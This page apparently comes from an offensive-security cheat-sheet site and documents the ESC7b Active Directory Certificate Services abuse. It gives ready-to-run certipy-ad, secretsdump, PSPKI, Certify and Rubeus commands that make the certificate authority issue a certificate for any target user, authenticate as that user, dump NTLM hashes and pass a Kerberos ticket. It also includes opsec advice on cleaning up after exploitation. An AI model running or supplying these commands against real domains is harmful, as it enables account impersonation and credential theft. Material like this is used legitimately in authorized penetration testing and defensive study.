🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC7b

ADCSESC7b

ESC7b: ManageCertificates (CA Officer) right β€” approve pending/failed certificate requests, enabling issuance of arbitrary certs by first requesting via SubCA template (denied), then force-issuing.

Applies to: Principals with ManageCertificates (Officer) right β†’ Enterprise CA

Linux Abuse

certipy-ad (SubCA template attack)

# Step 1: Enumerate CA rights
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Add self as officer (if ManageCA is also held β€” skip if already officer)
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -add-officer <username>

# Step 3: Enable the SubCA template on the CA
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -enable-template SubCA

# Step 4: Request cert via SubCA β€” this will be DENIED (manager approval required)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template SubCA \
  -upn <target-user>@<domain>
# Note the request ID from the output (e.g., Request ID: 785)

# Step 5: As officer, force-issue the denied request
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -issue-request <request-id>

# Step 6: Retrieve the now-issued certificate
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -retrieve <request-id>
# Output: <target-user>.pfx

# Step 7: Authenticate
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 8: PTH
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

PSPKI module (approve pending request)

Import-Module PSPKI

# List pending requests
Get-CertificationAuthority -ComputerName <ca-host> | Get-PendingRequest

# Approve specific request by ID
Get-CertificationAuthority -ComputerName <ca-host> | `
  Get-PendingRequest -RequestID <request-id> | `
  Approve-CertificateRequest

# Request via SubCA template (will be denied β€” get request ID)
Certify.exe request /ca:<ca-host>\<ca> /template:SubCA /upn:<target-user>@<domain>

# After approval, retrieve cert
Certify.exe download /ca:<ca-host>\<ca> /id:<request-id>

# TGT
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /ptt

Opsec

  • Approving certificate requests generates CA audit events (Event ID 4887).
  • Enabling the SubCA template is logged as a CA configuration change.
  • The issued certificate persists in the CA's Issued Certificates store.
  • Disable the SubCA template and revoke the certificate post-exploitation.